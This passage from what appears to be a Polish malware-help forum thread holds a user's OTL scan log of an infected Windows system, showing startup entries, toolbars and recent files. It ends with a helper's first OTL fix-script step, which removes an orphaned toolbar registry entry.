found) -- C:\Program Files\Mozilla Firefox\extensions File not found (No name found) -- [2011-07-08 14:35:29 | 000,000,000 | ---D | M] (avast! WebRep) -- C:\PROGRAM FILES\AVAST SOFTWARE\AVAST\WEBREP\FF [2011-04-05 06:54:09 | 000,000,000 | ---D | M] (Microsoft .NET Framework Assistant) -- C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V3.5\WINDOWS PRESENTATION FOUNDATION\DOTNETASSISTANTEXTENSION [2011-07-08 09:50:30 | 000,142,296 | ---- | M] (Mozilla Foundation) -- C:\Program Files\mozilla firefox\components\browsercomps.dll [2010-01-01 10:00:00 | 000,002,767 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\allegro-pl.xml [2010-01-01 10:00:00 | 000,001,406 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\fbc-pl.xml [2010-01-01 10:00:00 | 000,000,917 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\merlin-pl.xml [2010-01-01 10:00:00 | 000,000,858 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\pwn-pl.xml [2010-01-01 10:00:00 | 000,001,183 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\wikipedia-pl.xml [2010-01-01 10:00:00 | 000,001,683 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\wp-pl.xml O1 HOSTS File: ([2006-09-18 23:41:30 | 000,000,761 | ---- | M]) - C:\Windows\System32\drivers\etc\hosts O1 - Hosts: 127.0.0.1 localhost O1 - Hosts: ::1 localhost O2 - BHO: (no name) - {1E8A6170-7264-4D0F-BEAE-D42A53123C75} - C:\Program Files\Common Files\Symantec Shared\coShared\Browser\1.5\NppBHO.dll (Symantec Corporation) O2 - BHO: (SSVHelper Class) - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0_02\bin\ssv.dll (Sun Microsystems, Inc.) O2 - BHO: (avast! 
WebRep) - {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll (AVAST Software) O2 - BHO: (Windows Live Toolbar Helper) - {BDBD1DAD-C946-4A17-ADC1-64B5B4FF55D0} - c:\Program Files\Windows Live Toolbar\msntb.dll (Microsoft Corporation) O2 - BHO: (CPwmIEBrowserHelper Object) - {F040E541-A427-4CF7-85D8-75E3E0F476C5} - C:\Program Files\Lenovo\Client Security Solution\tvtpwm_ie_com.dll (Lenovo Group Limited) O3 - HKLM\..\Toolbar: (avast! WebRep) - {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll (AVAST Software) O3 - HKLM\..\Toolbar: (Show Norton Toolbar) - {90222687-F593-4738-B738-FBEE9C7B26DF} - C:\Program Files\Common Files\Symantec Shared\coShared\Browser\1.5\UIBHO.dll (Symantec Corporation) O3 - HKLM\..\Toolbar: (Windows Live Toolbar) - {BDAD1DAD-C946-4A17-ADC1-64B5B4FF55D0} - c:\Program Files\Windows Live Toolbar\msntb.dll (Microsoft Corporation) O3 - HKCU\..\Toolbar\WebBrowser: (no name) - {32099AAC-C132-4136-9E9A-4E364A424E17} - No CLSID value found. O3 - HKCU\..\Toolbar\WebBrowser: (Windows Live Toolbar) - {BDAD1DAD-C946-4A17-ADC1-64B5B4FF55D0} - c:\Program Files\Windows Live Toolbar\msntb.dll (Microsoft Corporation) O4 - HKLM..\Run: [avast] C:\Program Files\AVAST Software\Avast\avastUI.exe (AVAST Software) O4 - HKLM..\Run: [MSConfig] C:\Windows\System32\msconfig.exe (Microsoft Corporation) O4 - HKLM..\Run: [TrojanScanner] C:\Program Files\Trojan Remover\Trjscan.exe (Simply Super Software) O7 - HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveTypeAutoRun = 145 O8 - Extra context menu item: &Windows Live Search - c:\Program Files\Windows Live Toolbar\msntb.dll (Microsoft Corporation) O8 - Extra context menu item: Add to Google Photos Screensa&ver - C:\Windows\System32\GPhotos.scr (Google Inc.) O8 - Extra context menu item: Wyślij obraz do urządzenia &Bluetooth... 
- C:\Program Files\ThinkPad\Bluetooth Software\btsendto_ie_ctx.htm () O8 - Extra context menu item: Wyślij stronę do urządzenia &Bluetooth... - C:\Program Files\ThinkPad\Bluetooth Software\btsendto_ie.htm () O9 - Extra 'Tools' menuitem : ThinkVantage Password Manager... - {0045D4BC-5189-4b67-969C-83BB1906C421} - C:\Program Files\Lenovo\Client Security Solution\tvtpwm_ie_com.dll (Lenovo Group Limited) O9 - Extra 'Tools' menuitem : Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_02\bin\ssv.dll (Sun Microsystems, Inc.) O9 - Extra Button: @btrez.dll,-4015 - {CCA281CA-C863-46ef-9331-5C8D4460577F} - C:\Program Files\ThinkPad\Bluetooth Software\btsendto_ie.htm () O9 - Extra 'Tools' menuitem : @btrez.dll,-12650 - {CCA281CA-C863-46ef-9331-5C8D4460577F} - C:\Program Files\ThinkPad\Bluetooth Software\btsendto_ie.htm () O13 - gopher Prefix: missing O16 - DPF: {233C1507-6A77-46A4-9443-F871F945D258} http://download.macromedia.com/pub/shockwave/cabs/director/sw.cab (Shockwave ActiveX Control) O16 - DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} http://java.sun.com/update/1.6.0/jinstall-1_6_0_02-windows-i586.cab (Java Plug-in 1.6.0_02) O16 - DPF: {CAFEEFAC-0016-0000-0002-ABCDEFFEDCBA} http://java.sun.com/update/1.6.0/jinstall-1_6_0_02-windows-i586.cab (Java Plug-in 1.6.0_02) O16 - DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} http://java.sun.com/update/1.6.0/jinstall-1_6_0_02-windows-i586.cab (Java Plug-in 1.6.0_02) O17 - HKLM\System\CCS\Services\Tcpip\Parameters: DhcpNameServer = 192.168.1.1 O18 - Protocol\Handler\pure-go {4746C79A-2042-4332-8650-48966E44ABA8} - C:\Program Files\Common Files\Pure Networks Shared\puresp3.dll (Pure Networks, Inc.) 
O20 - HKLM Winlogon: Shell - (Explorer.exe) - C:\Windows\explorer.exe (Microsoft Corporation) O24 - Desktop WallPaper: C:\Users\Max\AppData\Roaming\Microsoft\Windows Photo Gallery\Tapeta z Galerii fotografii systemu Windows.jpg O24 - Desktop BackupWallPaper: C:\Users\Max\AppData\Roaming\Microsoft\Windows Photo Gallery\Tapeta z Galerii fotografii systemu Windows.jpg O31 - SafeBoot: AlternateShell - cmd-brontok.exe O32 - HKLM CDRom: AutoRun - 1 O32 - AutoRun File - [2006-09-18 23:43:36 | 000,000,024 | ---- | M] () - C:\autoexec.bat -- [ NTFS ] O32 - AutoRun File - [2011-07-18 13:58:14 | 000,000,059 | RHS- | M] () - D:\autorun.inf -- [ FAT ] O34 - HKLM BootExecute: (autocheck autochk *) - File not found O35 - HKLM\..comfile [open] -- "%1" %* O35 - HKLM\..exefile [open] -- "%1" %* O37 - HKLM\...com [@ = comfile] -- "%1" %* O37 - HKLM\...exe [@ = exefile] -- "%1" %* [color=#E56717]========== Files/Folders - Created Within 30 Days ==========[/color] [2011-07-23 14:51:44 | 000,000,000 | ---D | C] -- C:\Program Files\Ad-Remover [2011-07-23 14:19:13 | 000,000,000 | ---D | C] -- C:\_OTL [2011-07-19 23:11:14 | 000,000,000 | ---D | C] -- C:\A [2011-07-18 16:13:02 | 000,000,000 | ---D | C] -- C:\Users\Max\Desktop\Photoshop cs3 [2011-07-18 16:11:29 | 000,000,000 | ---D | C] -- C:\Users\Max\Desktop\17.07.2011 [2011-07-18 10:37:19 | 000,000,000 | ---D | C] -- C:\rsit [2011-07-18 10:22:08 | 000,000,000 | ---D | C] -- C:\Users\Max\AppData\Local\Adobe [2011-07-18 10:17:00 | 000,000,000 | ---D | C] -- C:\Muzyja [2011-07-15 21:23:31 | 000,518,144 | ---- | C] (SteelWerX) -- C:\Windows\SWREG.exe [2011-07-15 21:23:31 | 000,406,528 | ---- | C] (SteelWerX) -- C:\Windows\SWSC.exe [2011-07-15 21:23:31 | 000,212,480 | ---- | C] (SteelWerX) -- C:\Windows\SWXCACLS.exe [2011-07-15 21:23:31 | 000,060,416 | ---- | C] (NirSoft) -- C:\Windows\NIRCMD.exe [2011-07-15 21:23:22 | 000,000,000 | ---D | C] -- C:\Windows\ERDNT [2011-07-15 21:23:19 | 000,000,000 | --SD | C] -- C:\ComboFix [2011-07-15 21:23:15 
| 000,000,000 | ---D | C] -- C:\Qoobox [2011-07-15 21:23:01 | 000,000,000 | --SD | C] -- C:\32788R22FWJFW [2011-07-15 21:16:11 | 000,000,000 | ---D | C] -- C:\Program Files\Trend Micro [2011-07-15 21:16:11 | 000,000,000 | ---D | C] -- C:\Users\Max\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\HiJackThis [2011-07-15 21:13:47 | 000,000,000 | ---D | C] -- C:\Users\Max\AppData\Roaming\Safer Networking [2011-07-15 21:13:22 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Safer Networking [2011-07-15 21:13:21 | 000,000,000 | ---D | C] -- C:\Program Files\Safer Networking [2011-07-15 21:00:17 | 000,000,000 | ---D | C] -- C:\Users\Max\AppData\Roaming\AIMP [2011-07-15 20:59:19 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AIMP2 [2011-07-15 20:59:16 | 000,000,000 | ---D | C] -- C:\Program Files\AIMP2 [2011-07-15 20:38:47 | 000,000,000 | ---D | C] -- C:\Users\Max\Documents\Simply Super Software [2011-07-15 20:38:46 | 000,000,000 | ---D | C] -- C:\ProgramData\TEMP [2011-07-15 20:38:21 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Trojan Remover [2011-07-15 20:38:18 | 000,069,632 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\ztvcabinet.dll [2011-07-15 20:38:17 | 000,000,000 | ---D | C] -- C:\Program Files\Trojan Remover [2011-07-15 20:38:17 | 000,000,000 | ---D | C] -- C:\Users\Max\AppData\Roaming\Simply Super Software [2011-07-15 20:38:17 | 000,000,000 | ---D | C] -- C:\ProgramData\Simply Super Software [2011-07-13 11:48:57 | 000,000,000 | ---D | C] -- C:\Windows\System32\Adobe [2011-07-12 14:30:10 | 014,415,008 | ---- | C] (Mozilla) -- C:\Users\Max\Desktop\Firefox Setup 5.0.1-[www.legalne.info].exe [2011-07-11 13:14:07 | 000,000,000 | ---D | C] -- C:\Program Files\DAEMON Tools Toolbar [2011-07-11 13:13:33 | 000,000,000 | ---D | C] -- C:\Users\Max\AppData\Roaming\DAEMON Tools Lite [2011-07-11 13:13:33 | 000,000,000 | ---D | C] -- C:\ProgramData\DAEMON 
Tools Lite [2011-07-09 17:31:35 | 000,000,000 | ---D | C] -- C:\7' [2011-07-08 16:01:51 | 000,000,000 | ---D | C] -- C:\Program Files\RegCleaner [2011-07-08 14:36:31 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\avast! Free Antivirus [2011-07-08 14:36:30 | 000,019,544 | ---- | C] (AVAST Software) -- C:\Windows\System32\drivers\aswFsBlk.sys [2011-07-08 14:36:29 | 000,309,848 | ---- | C] (AVAST Software) -- C:\Windows\System32\drivers\aswSP.sys [2011-07-08 14:36:27 | 000,043,608 | ---- | C] (AVAST Software) -- C:\Windows\System32\drivers\aswTdi.sys [2011-07-08 14:36:27 | 000,025,432 | ---- | C] (AVAST Software) -- C:\Windows\System32\drivers\aswRdr.sys [2011-07-08 14:36:26 | 000,441,176 | ---- | C] (AVAST Software) -- C:\Windows\System32\drivers\aswSnx.sys [2011-07-08 14:36:25 | 000,054,104 | ---- | C] (AVAST Software) -- C:\Windows\System32\drivers\aswMonFlt.sys [2011-07-08 14:35:28 | 000,199,304 | ---- | C] (AVAST Software) -- C:\Windows\System32\aswBoot.exe [2011-07-08 14:35:28 | 000,040,112 | ---- | C] (AVAST Software) -- C:\Windows\avastSS.scr [2011-07-08 13:37:06 | 000,000,000 | ---D | C] -- C:\Dokument [2011-07-08 13:34:44 | 000,000,000 | ---D | C] -- C:\Zdjecia [2011-06-28 10:35:24 | 000,000,000 | ---D | C] -- C:\Users\Max\AppData\Roaming\Skype [2011-06-28 10:35:18 | 000,000,000 | ---D | C] -- C:\ProgramData\Google [2011-06-28 10:34:59 | 000,000,000 | ---D | C] -- C:\ProgramData\Skype [2011-06-25 22:56:47 | 000,000,000 | -H-D | C] -- C:\Users\Max\Desktop\.picasaoriginals [2008-11-10 13:50:10 | 000,167,936 | ---- | C] ( ) -- C:\Windows\System32\rsnp2uvc.dll [2008-11-10 13:50:10 | 000,053,248 | ---- | C] ( ) -- C:\Windows\System32\csnp2uvc.dll [color=#E56717]========== Files - Modified Within 30 Days ==========[/color] [2011-07-23 15:04:20 | 000,000,428 | -H-- | M] () -- C:\Windows\tasks\User_Feed_Synchronization-{D9B30BB4-63C0-47D4-A444-A174F9308500}.job [2011-07-23 14:54:54 | 000,065,536 | ---- | M] () -- 
C:\Windows\System32\Ikeext.etl [2011-07-23 14:54:11 | 000,003,472 | -H-- | M] () -- C:\Windows\System32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-1.C7483456-A289-439d-8115-601632D005A0 [2011-07-23 14:54:11 | 000,003,472 | -H-- | M] () -- C:\Windows\System32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-0.C7483456-A289-439d-8115-601632D005A0 [2011-07-23 14:54:03 | 000,067,584 | --S- | M] () -- C:\Windows\bootstat.dat [2011-07-23 14:53:57 | 2137,440,256 | -HS- | M] () -- C:\hiberfil.sys [2011-07-23 14:53:13 | 000,012,372 | ---- | M] () -- C:\Windows\bthservsdp.dat [2011-07-23 14:51:45 | 000,001,686 | ---- | M] () -- C:\Users\Max\Desktop\AD-R.lnk [2011-07-23 14:30:05 | 000,000,264 | ---- | M] () -- C:\Windows\tasks\Sprawdź aktualizacje paska narzędzi Windows Live Toolbar.job [2011-07-22 22:18:39 | 000,000,351 | ---- | M] () -- C:\Users\Max\Desktop\Dokument.rtf [2011-07-22 14:09:35 | 000,056,320 | ---- | M] () -- C:\Users\Max\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini [2011-07-22 14:09:32 | 735,087,260 | ---- | M] () -- C:\Users\Max\Desktop\High School Musical.avi [2011-07-22 13:38:29 | 220,638,918 | ---- | M] () -- C:\Windows\MEMORY.DMP [2011-07-21 23:43:08 | 012,213,624 | ---- | M] () -- C:\Users\Max\Desktop\Katalog_Avon_11_2011.pdf [2011-07-21 23:16:55 | 000,067,921 | ---- | M] () -- C:\Users\Max\8d976bf0a5.jpg [2011-07-21 23:07:18 | 003,578,148 | ---- | M] () -- C:\Users\Max\Desktop\Nowator_i_Feniks-_Jak_moglas.mp3 [2011-07-21 23:05:35 | 003,309,850 | ---- | M] () -- C:\Users\Max\Desktop\Nowator_-_Latino_kobieta.mp3 [2011-07-21 23:04:35 | 003,244,231 | ---- | M] () -- C:\Users\Max\Desktop\Chiwas__Nowator_-_Szpilki_.MP3.mp3 [2011-07-21 23:04:33 | 007,084,306 | ---- | M] () -- C:\Users\Max\Desktop\teoer-_we__go_poczuj.mp3 [2011-07-21 23:02:08 | 003,333,674 | ---- | M] () -- C:\Users\Max\Desktop\Nowator_-_Lollipop__.mp3 [2011-07-21 13:42:38 | 733,636,608 | ---- | M] () -- C:\Users\Max\Desktop\Zbuntowana Księżniczka.btgigs-wc.avi [2011-07-20 23:40:33 | 000,124,741 
| ---- | M] () -- C:\Users\Max\Desktop\dsc06248.jpg [2011-07-20 23:39:00 | 000,048,058 | ---- | M] () -- C:\Users\Max\Desktop\dsc06241.jpg [2011-07-20 23:39:00 | 000,047,894 | ---- | M] () -- C:\Users\Max\Desktop\dsc06247.jpg [2011-07-20 23:36:50 | 000,058,007 | ---- | M] () -- C:\Users\Max\Desktop\84146630.jpg [2011-07-18 10:16:33 | 000,535,568 | ---- | M] () -- C:\Windows\System32\perfh015.dat [2011-07-18 10:16:33 | 000,086,416 | ---- | M] () -- C:\Windows\System32\perfc015.dat [2011-07-18 10:16:32 | 000,610,142 | ---- | M] () -- C:\Windows\System32\perfh009.dat [2011-07-18 10:16:32 | 000,103,924 | ---- | M] () -- C:\Windows\System32\perfc009.dat [2011-07-18 10:02:58 | 000,147,456 | ---- | M] () -- C:\Users\Max\Desktop\catchme.exe [2011-07-17 21:40:32 | 000,073,728 | -H-- | M] () -- C:\Users\Max\Desktop\photothumb.db [2011-07-17 17:47:58 | 083,249,807 | ---- | M] () -- C:\Users\Max\Desktop\Disco_Polo_Mp3_16.06.2011_www.djoles.pl.rar [2011-07-17 17:42:26 | 057,380,242 | ---- | M] () -- C:\Users\Max\Desktop\Paczka_Disco-Polo_Mp3_(11.07.2011)_(www.DjOles.pl).rar [2011-07-15 21:16:30 | 000,002,533 | ---- | M] () -- C:\Users\Max\Desktop\HiJackThis.lnk [2011-07-15 21:00:05 | 000,000,770 | ---- | M] () -- C:\Users\Public\Desktop\AIMP2.lnk [2011-07-15 20:38:21 | 000,000,886 | ---- | M] () -- C:\Users\Public\Desktop\Trojan Remover.lnk [2011-07-13 15:46:42 | 000,000,271 | ---- | M] () -- C:\Users\Max\fix.reg [2011-07-13 15:46:42 | 000,000,271 | ---- | M] () -- C:\Users\Max\Desktop\fix.reg [2011-07-12 22:59:00 | 000,000,130 | ---- | M] () -- C:\Users\Max\Desktop\Add.url [2011-07-12 14:30:46 | 000,000,856 | ---- | M] () -- C:\Users\Public\Desktop\Mozilla Firefox.lnk [2011-07-12 14:30:16 | 014,415,008 | ---- | M] (Mozilla) -- C:\Users\Max\Desktop\Firefox Setup 5.0.1-[www.legalne.info].exe [2011-07-11 15:39:33 | 005,279,948 | ---- | M] () -- C:\Users\Max\Desktop\Aga M. 
- Za późno na słowa (www.DjOles.pl).mp3 [2011-07-11 11:13:17 | 001,383,966 | ---- | M] () -- C:\Users\Max\Desktop\lakiery%20dzbanek%20lemax%20nowe%20kolory.jpg [2011-07-08 16:02:52 | 000,000,777 | ---- | M] () -- C:\Users\Max\Desktop\RegCleaner.lnk [2011-07-08 14:36:31 | 000,001,839 | ---- | M] () -- C:\Users\Public\Desktop\avast! Free Antivirus.lnk [2011-07-08 14:36:25 | 000,002,577 | ---- | M] () -- C:\Windows\System32\config.nt [2011-07-08 14:18:03 | 000,025,269 | ---- | M] () -- C:\Windows\System32\PROCDB.INI [2011-07-08 14:18:01 | 000,000,380 | ---- | M] () -- C:\Windows\System32\IPSCtrl.INI [2011-07-04 13:43:53 | 000,040,112 | ---- | M] (AVAST Software) -- C:\Windows\avastSS.scr [2011-07-04 13:43:51 | 000,199,304 | ---- | M] (AVAST Software) -- C:\Windows\System32\aswBoot.exe [2011-07-04 13:36:43 | 000,441,176 | ---- | M] (AVAST Software) -- C:\Windows\System32\drivers\aswSnx.sys [2011-07-04 13:36:32 | 000,309,848 | ---- | M] (AVAST Software) -- C:\Windows\System32\drivers\aswSP.sys [2011-07-04 13:35:23 | 000,043,608 | ---- | M] (AVAST Software) -- C:\Windows\System32\drivers\aswTdi.sys [2011-07-04 13:32:32 | 000,025,432 | ---- | M] (AVAST Software) -- C:\Windows\System32\drivers\aswRdr.sys [2011-07-04 13:32:20 | 000,054,104 | ---- | M] (AVAST Software) -- C:\Windows\System32\drivers\aswMonFlt.sys [2011-07-04 13:32:12 | 000,019,544 | ---- | M] (AVAST Software) -- C:\Windows\System32\drivers\aswFsBlk.sys [2011-06-27 20:05:54 | 000,000,590 | ---- | M] () -- C:\Windows\tasks\Norton Internet Security - Uruchom pełne skanowanie systemu - Max.job [2011-06-26 08:45:56 | 000,256,000 | ---- | M] () -- C:\Windows\PEV.exe [color=#E56717]========== Files Created - No Company Name ==========[/color] [2011-07-23 14:51:45 | 000,001,686 | ---- | C] () -- C:\Users\Max\Desktop\AD-R.lnk [2011-07-21 23:42:56 | 012,213,624 | ---- | C] () -- C:\Users\Max\Desktop\Katalog_Avon_11_2011.pdf [2011-07-21 23:17:36 | 000,067,921 | ---- | C] () -- C:\Users\Max\8d976bf0a5.jpg [2011-07-21 
23:07:17 | 003,578,148 | ---- | C] () -- C:\Users\Max\Desktop\Nowator_i_Feniks-_Jak_moglas.mp3 [2011-07-21 23:05:34 | 003,309,850 | ---- | C] () -- C:\Users\Max\Desktop\Nowator_-_Latino_kobieta.mp3 [2011-07-21 23:04:35 | 003,244,231 | ---- | C] () -- C:\Users\Max\Desktop\Chiwas__Nowator_-_Szpilki_.MP3.mp3 [2011-07-21 23:04:33 | 007,084,306 | ---- | C] () -- C:\Users\Max\Desktop\teoer-_we__go_poczuj.mp3 [2011-07-21 23:02:07 | 003,333,674 | ---- | C] () -- C:\Users\Max\Desktop\Nowator_-_Lollipop__.mp3 [2011-07-20 23:39:34 | 000,048,058 | ---- | C] () -- C:\Users\Max\Desktop\dsc06241.jpg [2011-07-20 23:39:31 | 000,047,894 | ---- | C] () -- C:\Users\Max\Desktop\dsc06247.jpg [2011-07-20 23:39:10 | 000,124,741 | ---- | C] () -- C:\Users\Max\Desktop\dsc06248.jpg [2011-07-20 23:36:59 | 000,058,007 | ---- | C] () -- C:\Users\Max\Desktop\84146630.jpg [2011-07-20 22:30:13 | 000,000,351 | ---- | C] () -- C:\Users\Max\Desktop\Dokument.rtf [2011-07-18 16:11:25 | 051,147,301 | ---- | C] () -- C:\Users\Max\Desktop\Portable Adobe Photoshop Cs3 (10.0) PL.exe [2011-07-18 16:11:25 | 000,147,456 | ---- | C] () -- C:\Users\Max\Desktop\catchme.exe [2011-07-17 21:16:08 | 005,279,948 | ---- | C] () -- C:\Users\Max\Desktop\Aga M. 
- Za późno na słowa (www.DjOles.pl).mp3 [2011-07-17 17:47:54 | 083,249,807 | ---- | C] () -- C:\Users\Max\Desktop\Disco_Polo_Mp3_16.06.2011_www.djoles.pl.rar [2011-07-17 17:42:23 | 057,380,242 | ---- | C] () -- C:\Users\Max\Desktop\Paczka_Disco-Polo_Mp3_(11.07.2011)_(www.DjOles.pl).rar [2011-07-15 21:23:31 | 000,256,000 | ---- | C] () -- C:\Windows\PEV.exe [2011-07-15 21:23:31 | 000,208,896 | ---- | C] () -- C:\Windows\MBR.exe [2011-07-15 21:23:31 | 000,098,816 | ---- | C] () -- C:\Windows\sed.exe [2011-07-15 21:23:31 | 000,080,412 | ---- | C] () -- C:\Windows\grep.exe [2011-07-15 21:23:31 | 000,068,096 | ---- | C] () -- C:\Windows\zip.exe [2011-07-15 21:16:12 | 000,002,533 | ---- | C] () -- C:\Users\Max\Desktop\HiJackThis.lnk [2011-07-15 20:59:19 | 000,000,770 | ---- | C] () -- C:\Users\Public\Desktop\AIMP2.lnk [2011-07-15 20:38:21 | 000,000,886 | ---- | C] () -- C:\Users\Public\Desktop\Trojan Remover.lnk [2011-07-15 20:38:18 | 000,162,304 | ---- | C] () -- C:\Windows\System32\ztvunrar36.dll [2011-07-15 20:38:18 | 000,153,088 | ---- | C] () -- C:\Windows\System32\UNRAR3.dll [2011-07-15 20:38:18 | 000,077,312 | ---- | C] () -- C:\Windows\System32\ztvunace26.dll [2011-07-15 20:38:18 | 000,075,264 | ---- | C] () -- C:\Windows\System32\unacev2.dll [2011-07-14 22:23:48 | 735,087,260 | ---- | C] () -- C:\Users\Max\Desktop\High School Musical.avi [2011-07-14 22:03:58 | 328,523,530 | ---- | C] () -- C:\Users\Max\Desktop\Kopciuszek - Roztańczona Historia... 
dmx-acs.rmvb [2011-07-13 22:20:21 | 733,636,608 | ---- | C] () -- C:\Users\Max\Desktop\Zbuntowana Księżniczka.btgigs-wc.avi [2011-07-13 22:20:14 | 348,069,959 | ---- | C] () -- C:\Users\Max\Desktop\Czego pragnie dziewczyna Lektor PL.rmvb [2011-07-13 15:46:57 | 000,000,271 | ---- | C] () -- C:\Users\Max\Desktop\fix.reg [2011-07-13 15:45:52 | 000,000,271 | ---- | C] () -- C:\Users\Max\fix.reg [2011-07-12 22:59:00 | 000,000,130 | ---- | C] () -- C:\Users\Max\Desktop\Add.url [2011-07-12 14:30:46 | 000,000,868 | ---- | C] () -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk [2011-07-12 14:30:46 | 000,000,856 | ---- | C] () -- C:\Users\Public\Desktop\Mozilla Firefox.lnk [2011-07-11 11:13:40 | 001,383,966 | ---- | C] () -- C:\Users\Max\Desktop\lakiery%20dzbanek%20lemax%20nowe%20kolory.jpg [2011-07-08 16:01:52 | 000,000,777 | ---- | C] () -- C:\Users\Max\Desktop\RegCleaner.lnk [2011-07-08 14:36:31 | 000,001,839 | ---- | C] () -- C:\Users\Public\Desktop\avast! Free Antivirus.lnk [2011-06-26 12:28:22 | 2137,440,256 | -HS- | C] () -- C:\hiberfil.sys [2011-05-22 21:59:25 | 000,004,096 | -H-- | C] () -- C:\Users\Max\AppData\Local\keyfile3.drm [2011-03-29 07:52:33 | 000,000,634 | ---- | C] () -- C:\Windows\ODBC.INI [2011-01-23 22:28:13 | 000,192,512 | ---- | C] () -- C:\Windows\System32\srkey.exe [2009-03-17 17:05:25 | 000,025,773 | ---- | C] () -- C:\Users\Max\AppData\Roaming\UserTile.png [2008-11-11 10:57:59 | 000,056,320 | ---- | C] () -- C:\Users\Max\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini [2008-11-11 10:55:51 | 000,164,352 | ---- | C] () -- C:\Windows\System32\unrar.dll [2008-11-11 10:55:51 | 000,000,038 | ---- | C] () -- C:\Windows\avisplitter.ini [2008-11-10 22:02:05 | 000,535,568 | ---- | C] () -- C:\Windows\System32\perfh015.dat [2008-11-10 22:02:05 | 000,332,832 | ---- | C] () -- C:\Windows\System32\perfi015.dat [2008-11-10 22:02:05 | 000,086,416 | ---- | C] () -- C:\Windows\System32\perfc015.dat [2008-11-10 22:02:05 | 
000,037,468 | ---- | C] () -- C:\Windows\System32\perfd015.dat [2008-11-10 14:08:09 | 002,115,816 | ---- | C] () -- C:\Windows\System32\NPSWF32.dll [2008-11-10 13:58:42 | 001,238,832 | ---- | C] () -- C:\Windows\System32\igmedkrn.dll [2008-11-10 13:58:42 | 000,249,856 | ---- | C] () -- C:\Windows\System32\igfxTMM.dll [2008-11-10 13:58:42 | 000,147,456 | ---- | C] () -- C:\Windows\System32\igfxCoIn_v1329.dll [2008-11-10 13:58:42 | 000,104,636 | ---- | C] () -- C:\Windows\System32\igmedcompkrn.dll [2008-11-10 13:50:11 | 000,015,497 | ---- | C] () -- C:\Windows\snp2uvc.ini [2008-11-10 13:50:10 | 009,598,080 | ---- | C] () -- C:\Windows\System32\drivers\snp2uvc.sys [2008-11-10 13:43:53 | 000,012,080 | ---- | C] () -- C:\Windows\System32\drivers\TPPWR32V.SYS [2008-11-10 13:33:23 | 000,012,372 | ---- | C] () -- C:\Windows\bthservsdp.dat [2007-07-27 08:37:40 | 000,025,269 | ---- | C] () -- C:\Windows\System32\PROCDB.INI [2007-07-27 08:37:29 | 000,000,380 | ---- | C] () -- C:\Windows\System32\IPSCtrl.INI [2007-05-24 22:51:58 | 000,016,896 | ---- | C] () -- C:\Windows\Eventclr.exe [2007-05-10 18:34:13 | 000,006,218 | ---- | C] () -- C:\Windows\System32\tp4table.dat [2007-03-29 13:42:38 | 000,389,120 | ---- | C] () -- C:\Windows\System32\btwhidcs.dll [2006-11-02 14:57:28 | 000,067,584 | --S- | C] () -- C:\Windows\bootstat.dat [2006-11-02 14:47:37 | 000,317,712 | ---- | C] () -- C:\Windows\System32\FNTCACHE.DAT [2006-11-02 14:35:32 | 000,005,632 | ---- | C] () -- C:\Windows\System32\sysprepMCE.dll [2006-11-02 12:33:01 | 000,610,142 | ---- | C] () -- C:\Windows\System32\perfh009.dat [2006-11-02 12:33:01 | 000,287,440 | ---- | C] () -- C:\Windows\System32\perfi009.dat [2006-11-02 12:33:01 | 000,103,924 | ---- | C] () -- C:\Windows\System32\perfc009.dat [2006-11-02 12:33:01 | 000,030,674 | ---- | C] () -- C:\Windows\System32\perfd009.dat [2006-11-02 12:23:21 | 000,215,943 | ---- | C] () -- C:\Windows\System32\dssec.dat [2006-11-02 10:58:30 | 000,043,131 | ---- | C] () -- 
C:\Windows\mib.bin [2006-11-02 10:19:00 | 000,000,741 | ---- | C] () -- C:\Windows\System32\NOISE.DAT [2006-11-02 09:40:29 | 000,013,750 | ---- | C] () -- C:\Windows\System32\pacerprf.ini [2006-11-02 09:25:31 | 000,673,088 | ---- | C] () -- C:\Windows\System32\mlang.dat [2006-11-02 09:22:43 | 000,099,999 | ---- | C] () -- C:\Windows\System32\StructuredQuerySchema.bin [2006-11-02 09:22:43 | 000,018,271 | ---- | C] () -- C:\Windows\System32\StructuredQuerySchemaTrivial.bin [2003-04-08 11:40:22 | 000,005,679 | ---- | C] () -- C:\Windows\System32\OUTLPERF.INI [2001-11-14 14:56:00 | 001,802,240 | ---- | C] () -- C:\Windows\System32\lcppn21.dll [color=#E56717]========== Alternate Data Streams ==========[/color] @Alternate Data Stream - 64 bytes -> C:\Users\Max\Desktop\Zbuntowana Księżniczka.btgigs-wc.avi:TOC.WMV @Alternate Data Stream - 64 bytes -> C:\Users\Max\Desktop\High School Musical.avi:TOC.WMV < End of report > [/log]
wirusolog commented 23 July 2011

[b]1.[/b] Run OTL and paste the following text into the [b]Własne opcje skanowania/Skrypt[/b] (Custom scan options/Script) box:

[code]
:OTL
O3 - HKCU\..\Toolbar\WebBrowser: (no name) - {32099AAC-C132-4136-9E9A-4E364A424E17} - No CLSID value found.
